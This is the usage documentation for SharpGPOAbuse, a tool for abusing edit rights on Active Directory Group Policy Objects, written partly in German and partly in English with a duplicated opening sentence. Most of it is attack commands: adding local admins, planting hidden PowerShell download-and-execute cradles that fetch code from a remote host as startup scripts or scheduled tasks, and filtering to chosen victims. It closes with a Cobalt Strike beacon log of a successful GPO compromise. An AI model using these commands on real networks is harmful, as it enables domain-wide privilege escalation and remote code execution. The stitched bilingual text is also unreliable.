
SharpGPOAbuse ist eine in C# geschriebene .NET-Anwendung, die verwendet werden kann, um die Bearbeitungsrechte eines Benutzers an einem Gruppenrichtlinienobjekt (GPO) auszunutzen und so die von diesem GPO gesteuerten Objekte zu kompromittieren.
SharpGPOAbuse ist eine .NET-Anwendung in C#, die dazu verwendet werden kann, die Bearbeitungsrechte eines Benutzers an einem Gruppenrichtlinienobjekt (GPO) auszunutzen, um die Objekte zu gefährden, die von diesem GPO gesteuert werden.
Weitere Details finden Sie im folgenden Blogbeitrag: https://labs.mwrinfosecurity.com/tools/sharpgpoabuse
Stellen Sie sicher, dass die erforderlichen NuGet-Pakete ordnungsgemäß installiert sind, und erstellen Sie das Projekt einfach in Visual Studio.
Usage:
SharpGPOAbuse.exe <AttackType> <AttackOptions>
Derzeit unterstützt SharpGPOAbuse die folgenden Optionen:
| Option | Beschreibung |
|---|---|
| --AddUserRights | Rechte zu einem Benutzer hinzufügen |
| --AddLocalAdmin | Einen Benutzer zur lokalen Administratorengruppe hinzufügen |
| --AddComputerScript | Ein neues Computer-Startskript hinzufügen |
| --AddUserScript | Ein Benutzeranmeldeskript konfigurieren |
| --AddComputerTask | Eine sofortige Computeraufgabe konfigurieren |
| --AddUserTask | Eine sofortige Aufgabe für einen Benutzer hinzufügen |
Options required to add new user rights:
--UserRights
Set the new rights to add to a user. This option is case sensitive and a comma separeted list must be used.
--UserAccount
Set the account to add the new rights.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddUserRights --UserRights "SeTakeOwnershipPrivilege,SeRemoteInteractiveLogonRight" --UserAccount bob.smith --GPOName "Vulnerable GPO"
Options required to add a new local admin:
--UserAccount
Set the name of the account to be added in local admins.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddLocalAdmin --UserAccount bob.smith --GPOName "Vulnerable GPO"
Options required to add a new user or computer startup script:
--ScriptName
Set the name of the new startup script.
--ScriptContents
Set the contents of the new startup script.
--GPOName
The name of the vulnerable GPO.
Example:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
Wenn Sie das schädliche Skript nur auf einem bestimmten Benutzer oder Computer ausführen möchten, der von dem verwundbaren GPO gesteuert wird, können Sie eine if-Anweisung innerhalb des schädlichen Skripts hinzufügen:
SharpGPOAbuse.exe --AddUserScript --ScriptName StartupScript.bat --ScriptContents "if %username%==<targetusername> powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
Options required to add a new computer or user immediate task:
--TaskName
Set the name of the new computer task.
--Author
Set the author of the new task (use a DA account).
--Command
Command to execute.
--Arguments
Arguments passed to the command.
--GPOName
The name of the vulnerable GPO.
Additional User Task Options:
--FilterEnabled
Enable Target Filtering for user immediate tasks.
--TargetUsername
The user to target. The malicious task will run only on the specified user. Should be in the format <DOMAIN>\<USERNAME>
--TargetUserSID
The targeted user's SID.
Additional Computer Task Options:
--FilterEnabled
Enable Target Filtering for computer immediate tasks.
–-TargetDnsName
The DNS name of the computer to target. The malicious task will run only on the specified host.
Example:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO"
Wenn Sie die schädliche Aufgabe nur auf einem bestimmten Benutzer oder Computer ausführen möchten, der von dem verwundbaren GPO gesteuert wird, können Sie etwas Ähnliches wie das Folgende verwenden:
SharpGPOAbuse.exe --AddComputerTask --TaskName "Update" --Author DOMAIN\Admin --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.10:80/a'))\"" --GPOName "Vulnerable GPO" --FilterEnabled --TargetDnsName target.domain.com
| Option | Beschreibung |
|---|---|
| --DomainController | Ziel-Domänencontroller festlegen |
| --Domain | Zieldomäne festlegen |
| --Force | Vorhandene Dateien bei Bedarf überschreiben |
beacon> execute-assembly /root/Desktop/SharpGPOAbuse.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[*] Tasked beacon to run .NET program: SharpGPOAbuse_final.exe --AddComputerTask --TaskName "New Task" --Author EUROPA\Administrator --Command "cmd.exe" --Arguments "/c powershell.exe -nop -w hidden -c \"I
EX ((new-object net.webclient).downloadstring('http://10.1.1.141:80/a'))\"" --GPOName "Default Server Policy"
[+] host called home, sent: 171553 bytes
[+] received output:
[+] Domain = europa.com
[+] Domain Controller = EURODC01.europa.com
[+] Distinguished Name = CN=Policies,CN=System,DC=europa,DC=com
[+] GUID of "Default Server Policy" is: {877CB769-3543-40C6-A757-F2DF4E5E28BD}
[+] Creating file \\europa.com\SysVol\europa.com\Policies\{877CB769-3543-40C6-A757-F2DF4E5E28BD}\Machine\Preferences\ScheduledTasks\ScheduledTasks.xml
[+] versionNumber attribute changed successfully
[+] The version number in GPT.ini was increased successfully.
[+] The GPO was modified to include a new immediate task. Wait for the GPO refresh cycle.
[+] Done!